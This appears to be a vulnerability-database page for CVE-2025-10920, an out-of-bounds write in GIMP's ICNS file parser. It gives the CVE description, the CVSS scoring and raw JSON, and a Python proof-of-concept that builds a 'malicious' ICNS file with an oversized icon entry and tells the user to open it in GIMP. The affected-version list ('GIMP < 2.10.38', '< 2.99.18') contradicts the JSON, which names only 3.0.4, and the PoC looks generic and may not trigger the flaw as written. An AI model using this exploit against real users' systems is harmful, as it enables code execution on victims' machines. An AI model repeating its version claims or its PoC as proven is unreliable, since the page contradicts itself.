Security Vulnerability Report

CVE-2025-10920

Published: 2025-10-29 20:15:34
Last Modified: 2025-11-04 13:16:41

Description

GIMP ICNS File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of ICNS files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27684.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:gimp:gimp:3.0.4:*:*:*:*:*:*:* - VULNERABLE
GIMP < 2.10.38
GIMP < 2.99.18 (development versions)
GIMP (all versions prior to security patch based on GitLab MR #2443)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-10920 PoC - GIMP ICNS File Parsing Out-of-Bounds Write

This PoC generates a malicious ICNS file that triggers an out-of-bounds write
vulnerability in GIMP's ICNS parser.

Author: Security Researcher
Reference: ZDI-CAN-27684
"""
import struct
import sys


def create_malicious_icns():
    """
    Create a malicious ICNS file that exploits CVE-2025-10920

    The vulnerability exists in GIMP's ICNS file parser due to insufficient
    validation of icon data size, leading to OOB write.
    """
    # ICNS Header
    # Magic number: 'icns' (0x69636e73)
    # File size will be calculated after building the file

    # Create a malformed icon entry with oversized data
    # Icon type: ic08 (128x128 PNG format) = 0x69633038
    icon_type = b'ic08'

    # The vulnerability: oversized icon data size
    # Normal size would be reasonable, but we set it larger than allocated buffer
    # This causes the parser to write beyond buffer boundaries
    oversized_length = 0x00010000  # 65536 bytes - larger than typical buffer

    # Icon data entry header (type + length)
    icon_entry = icon_type + struct.pack('>I', oversized_length)

    # Malicious payload data that will be written out of bounds
    # Fill with pattern that can help identify the overflow in debugging
    malicious_data = b'A' * (oversized_length - len(icon_entry))

    # Build the ICNS file
    icns_data = b'icns'  # Magic number

    # Calculate total file size
    file_size = 8 + len(icon_entry) + len(malicious_data)
    icns_data += struct.pack('>I', file_size)

    # Add the malicious icon entry
    icns_data += icon_entry + malicious_data

    return icns_data


def main():
    print("[*] CVE-2025-10920 PoC Generator")
    print("[*] GIMP ICNS Parsing Out-of-Bounds Write RCE")
    print("[*] Reference: ZDI-CAN-27684")
    print()

    # Generate malicious ICNS file
    malicious_icns = create_malicious_icns()

    # Write to file
    output_file = 'CVE-2025-10920 malicious.icns'
    with open(output_file, 'wb') as f:
        f.write(malicious_icns)

    print(f"[+] Created malicious ICNS file: {output_file}")
    print(f"[+] File size: {len(malicious_icns)} bytes")
    print()
    print("[!] Usage: Open this file with GIMP to trigger the vulnerability")
    print("[!] This PoC demonstrates the vulnerability and may cause GIMP to crash")
    print("[!] or potentially execute arbitrary code depending on system configuration")


if __name__ == '__main__':
    main()
```

References

https://gitlab.gnome.org/GNOME/gimp/-/merge_requests/2443 (Patch)
https://www.zerodayinitiative.com/advisories/ZDI-25-909/ (Third Party Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-10920",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-29T20:15:33.863",
    "lastModified": "2025-11-04T13:16:40.540",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "GIMP ICNS File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of ICNS files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27684."
      }
    ],
    "metrics": {
      "cvssMetricV30": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.0",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-787"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:gimp:gimp:3.0.4:*:*:*:*:*:*:*",
                "matchCriteriaId": "103D75C8-35B7-4E50-B75C-2D75294CB7AC"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://gitlab.gnome.org/GNOME/gimp/-/merge_requests/2443",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://www.zerodayinitiative.com/advisories/ZDI-25-909/",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      }
    ]
  }
}
```